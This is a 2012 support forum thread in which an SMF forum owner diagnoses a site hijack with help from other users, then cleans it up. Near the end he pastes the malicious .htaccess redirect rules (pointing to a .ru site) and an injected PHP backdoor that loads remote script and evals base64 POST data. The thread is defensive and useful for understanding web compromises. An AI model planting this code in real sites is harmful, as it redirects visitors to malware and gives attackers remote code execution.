URGENT - ( yes I have ) BEEN HACKED - NEED HELP

Started by DevinL, January 04, 2012, 05:09:09 PM

Previous topic - Next topic

DevinL

I think.

Every thing I click on, on my forum is trying to redirect me to:

"http://www.opsofo.com/index.php?PHPSESSID=hikgufeu07mcqo57i09q8fm9s1;wwwRedirect"

I'll worry about how after, but I need to get rid of this ASAP, where is this coming from?
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Illori

that is not a hacking, it is a phpsession id added to your url along with a wwwredirect. which neither are hacking related your forum is fine.

DevinL

OK thanks. Just so I understand, this is happening how, from my browser?
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Illori

if your browser correctly accepted the cookie the phpsession id should not appear in the address bar.

DevinL

Sorry if I'm pissing people off with my ignorance here. This problem doesn't seem to be browser related. I have tried from 2 different computers now, and from my phone connected over the cell net (not wifi). I'm getting the same thing on all three devices so I don't understand where this is coming from if not from the site.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Illori

it is part of how smf works, it is not related to hacking

DevinL

Ok I get that its not hacking Illori. I have changed the post title. Can you or someone please tell me where to start looking or working to rectify this problem.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

MrPhil

If your browser is not configured to accept cookies, you'll get that session ID past the first page or two (once you sign in). If your browser is configured to allow cookies, you may have some sort of configuration problem. Try clearing your browser cache and your SMF-specific cookie(s), and search for other postings discussing this problem (IIRC one solution is to change the cookie name in SMF's configuration in Settings.php).

DevinL

Thank you MrPhil. I have cleared my cookies and checked to make sure it's accepting cookies. This is happening across 3 different devices, so to my way of thinking something has changed on the server side of things.  The only thing I changed was was to add google analytics script (which was working fine) and to add the sitemap mod. The forum tested out fine after both those installs.
I'm sure I haven't changed anything else.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

DevinL

Sorry if I'm coming across pissy to you guys, its not intended to be that way. I'm just very frustrated with this. I'm new to this, and don't have the kind of experience and understanding you guys have.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen

Quote from: DevinL on January 04, 2012, 08:06:47 PM
Thank you MrPhil. I have cleared my cookies and checked to make sure it's accepting cookies. This is happening across 3 different devices, so to my way of thinking something has changed on the server side of things.  The only thing I changed was was to add google analytics script (which was working fine) and to add the sitemap mod. The forum tested out fine after both those installs.
I'm sure I haven't changed anything else.

looked at your site  and imo some kind of javascript conflict with that google anyalytics mod.

Manually typing in regular url's works fine.
Do you have one of the mods installed that changes url's like Simple SEF or maybe Pretty Url's?
Try disabling/uninstalling it for a test.

My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

Thank you Underdog. I do have pretty url installed.

I'll pull the google code and see if that helps
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

mashby

I'd uninstall prettyURLs. They aren't doing much for you. The Google code is more valuable.
Always be a little kinder than necessary.
- James M. Barrie

DevinL

Ok, the question then I have now is how? I cant log into my admin panel with the redirect problem. Or am I better to just lose the google code for now, and reinstall after I ditch pretty urls?
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen

Quote from: DevinL on January 04, 2012, 08:28:59 PM
Ok, the question then I have now is how? I cant log into my admin panel with the redirect problem. Or am I better to just lose the google code for now, and reinstall after I ditch pretty urls?

Navigate directly to this url: http://www.opsofo.com/index.php?action=admin;area=packages;

My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

Quote from: -Underdog- on January 04, 2012, 08:33:11 PM
Quote from: DevinL on January 04, 2012, 08:28:59 PM
Ok, the question then I have now is how? I cant log into my admin panel with the redirect problem. Or am I better to just lose the google code for now, and reinstall after I ditch pretty urls?

Navigate directly to this url: http://www.opsofo.com/index.php?action=admin;area=packages;

Thanks I did manage to figure that part out, but I get trapped at the password login. Can I pass login information in the url as well?
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen

Quote from: DevinL on January 04, 2012, 08:40:26 PM
Thanks I did manage to figure that part out, but I get trapped at the password login. Can I pass login information in the url as well?

No.
Perhaps the repair settings tool is in order?

Read this: http://docs.simplemachines.org/index.php?topic=663.0

.. or your other option is to use the large upgrade package which will replace all SMF files with defaults.


My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

Just remembered, I never got the google code to work, and installed http://custom.simplemachines.org/mods/index.php?mod=2210 to get it going. Could this be the offending party?
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen


Did you manually add some code somewhere?
Like some sort of Bing Analytics script?

My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

No I haven't added any code. I did originality add the Google analytics code, but it didn't work properly so I removed it. I know I rechecked that everything was working after I removed the code and everything was fine. The more I think about it, I'm sure its that mod I used that I mentioned above. I'm sure I forgot to recheck the forums after I installed it. I just remember being happy that Google gave me the thumbs up for being able to do the analytics, and completely forgot to make sure the forums were still functional. Damn it!
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen

Quote from: DevinL on January 04, 2012, 09:31:53 PM
No I haven't added any code. I did originality add the Google analytics code, but it didn't work properly so I removed it. I know I rechecked that everything was working after I removed the code and everything was fine. The more I think about it, I'm sure its that mod I used that I mentioned above. I'm sure I forgot to recheck the forums after I installed it. I just remember being happy that Google gave me the thumbs up for being able to do the analytics, and completely forgot to make sure the forums were still functional. Damn it!

I only asked because your links end up with some broken js script that freezes & 2 links are visible on the blank page, one of them being the bing (ms) search engine.
Anyhow, read the page for the repair settings mod & use it. Then uninstall the mod(s) that you think is causing the issue.

Failing that, use the large upgrade package method (db will remain intact).


My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

Thanks Underdog. I'm trying to do that now, but am having trouble getting to the file with the browser. Just keeps redirecting me
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen

Quote from: DevinL on January 04, 2012, 10:04:59 PM
Thanks Underdog. I'm trying to do that now, but am having trouble getting to the file with the browser. Just keeps redirecting me

??

I accessed the file without issue but the only thing it accomplished was putting the forum in maintenance mode.
Use the large upgrade package option.


That should revert your forum back to default with your db intact.
All your mods should appear as not being installed in your package manager.




My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

Thanks man. Yeah I needed to clear my cookies again before I could access the repair file. In the end it didn't do any good as you noted.

I do have a question for you though.

I have gotten word from some members, as well as other people from other forums who were trying to help me, that some of them were redirected to a site in Russia. I'm still not convinced that someone hasn't somehow hacked my site somehow. I get the whole redirect thing, but I doubt SMF is supposed to redirect people to a site in Russia! Any thoughts?
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

DevinL

Special Thank you to Underdog for taking the time to try and help me out. I'm glad you and a few others gave damn and helped out.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

busterone

I can confirm the redirect to a Russian site as well.  I was clicking all your menu links to see if anything wast wonky on your site and the the search button redirected me to the Russian site, upon which some kind of java enabled malware attempted to hijack my computer.  Nod32 stopped the malware, but Firefox crashed.  I meant to get back here and report it immediately, but had some personal business to take me away from the computer until now. This happened before Underdog stepped in to help, so I can't say if the redirect is still there or not.

DevinL

Thanks busterone. I have confirmed this now from multiple sources as well. I'm sure there are still some people who will refuse to believe it, but this did happen!

I'll try and do a post here with all the information about any mods that were done leading up to this, maybe some else can figure it out. There IS a problem here some where.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen

#27
I see your site seems to be working now.

There were 2 redirects on the page. One was the  for the bing search engine and the other was a Russian site.
Most of the time with Firefox the js just crashed to a white page and viewing the source code I could see the 2 links.
Other times it redirected me to the second url (Russian site).
I actually thought you entered some manual code (malicious?) somewhere for some bing search engine analytics which is why I previously asked about it.

What were all the mods you had installed? Also.. did you download them all from here?


My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

Mods that were installed:

Simple portal
Pretty URLs
Sitemap
Pm_informer (though it wasn't working at the time)
Add Domaintools to TrackIP
Aeva Media
Google Analytics Code

No mods were installed from outside this site.
The only code I have installed was the AddThis code.

No other code was installed by me. I had tried to install the google analytics code, but failed and reverted back to a save copy of the file. Hence why I installed the Google mod.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen


I've dug up some recent reports of similar site hijacks ref. http://blog.sucuri.net/2011/08/wordpress-sites-with-htaccess-hacked.html
The reference is regarding WP sites specifically with .htaccess files being rewritten for browser redirects to Russian sites containing malware.
Do you run both SMF and WP from the same domain?

The redirects are still occurring when I purposely alter the url's to reflect how the pretty url's mod would have altered them.

Look for a .htaccess file in your main directory, open it in a text editor & then copy/paste it here in a bbc code box.

My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

Chen Zhen

#30
Also the page is redirected when someone accesses your site via google (& probably other search engines).

Another quick ref. (same source) for some info regarding this type of hijack using .htaccess exploits: http://blog.sucuri.net/2011/05/understanding-htaccess-attacks-part-1.html

before you delete the file I would like to see its contents as requested.

\\Edit -> You can use this online tool to scan your site for malware: http://sitecheck.sucuri.net/scanner/

My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

Thanks Underdog (again)! I'll get that info to you when I can get to it. In the mean time I did run that scan, and among other things it did find a redirect in a phony 404 error file. I'll look at this more shortly, I had really hoped this was past me now.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen

Quote from: DevinL on January 06, 2012, 11:26:21 AM
Thanks Underdog (again)! I'll get that info to you when I can get to it. In the mean time I did run that scan, and among other things it did find a redirect in a phony 404 error file. I'll look at this more shortly, I had really hoped this was past me now.

I am very curious as to how this occurred. I can guess at several possibilities but you are the only one with access to all your files to view them & also access to Cpanel logs which might provide some more info regarding the onset of the hack (<- maybe figure out it occurred after certain actions/installs by you).

You did have mods installed directly related to modifying/creating .htaccess files.
I do not know which FTP platform you use but you may have to go into its options and enable hidden files to see .htaccess files.




My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

Dude you nailed it!


<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://get-byid.ru/ruby/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://get-byid.ru/ruby/index.php [R=301,L]
</IfModule>


After and lot of white space:




ErrorDocument 400 http://get-byid.ru/ruby/index.php
ErrorDocument 401 http://get-byid.ru/ruby/index.php
ErrorDocument 403 http://get-byid.ru/ruby/index.php
ErrorDocument 404 http://get-byid.ru/ruby/index.php
ErrorDocument 500 http://get-byid.ru/ruby/index.php





I also noticed that file was last modified today at 13:33 ( I assume local server time) so it was being accessed while I was completely offline. Permissions are set to 444.

I see I have the option to look at raw access logs, so I'll have a look at them to see if I can find anything out.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

DevinL

I also found that same file in my root directory with a 444 permission.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen

#35
That is the culprit - some .ru redirects are listed in there.
Delete those .htaccess files & change the actual directory permission to 755.

Change both your mysql & phpmyadmin p/w & then update your Settings.php file to match.
Look for php files that do not belong. Someone could have somehow created in a file that allows them to trigger a rewrite of that .htaccess redirect bs and/or other malicious intent.

May I also add that most people get their mysql & phpmyadmin (ftp) login & p/w emailed to them. Consider the fact that your email  p/w may have been compromised so I would suggest to also change that p/w first. Also change your p/w for site login.

My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

Thanks again Underdog. I'll do all those things you suggest ( I already changed the files). I'll just have to wait for google to crawl again I suppose before I can remedy that redirect.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen


What was the directory permission for your public_html folder before changing it to 755?
Also note that you have to check all your directory permissions after & including your public_html folder.
A directory permission value further in the tree will override the previous for its contained files/folders.

You need to find the source (most likely a malicious php file) to stop it from reoccurring.
Atm the problem persists.


My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

checking directory permissions I found:

under themes:

All downloaded themes are set to 777. I deleted the ones I'm not using, and reset ADK_Coolblack to 755
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

DevinL

#39
I started checking files. Found this in a file called "500.php":


<!-- PHP Wrapper - 500 Server Error -->
<html><head><title>500 Server Error</title></head>
<body bgcolor=white>
<h1>500 Server Error</h1>

A misconfiguration on the server caused a hiccup.
Check the server logs, fix the problem, then try again.
<hr>

<?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o 1$sessdt_k "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v urlencode(strrev($sessdt_j)); $sessdt_u "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

echo 
"URL: http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]<br>\n";
echo `
checksuexec`;
?>


</body></html>



Undoubtedly you notice the reference to:

"http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"


I googled it at found all kinds of bad things.

I've deleted it, but would like to hear your thoughts, particularly on the references google found.


Edit: I also found that code in a file called: w32072698w.php
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen

#40
Remove files from public_html directory:

404javascript.js
404testpage4525d2fdc

.. the scan found those as malware. Also look for suspicious code that could have been edited into your index.php file although the upgrade package should have replaced it anew.
Did you contact the host regarding the issue?

My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

Turns out that code was in every single php file I had. I've gone though and manually edited it out of all php files, and things seem happy again.

That java script was coming from a redirect in a .htaccess file that was in the root directory. I thought I had checked it, but must have missed it somehow.

I think all is well again, and hopefully it will stay that way.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Advertisement: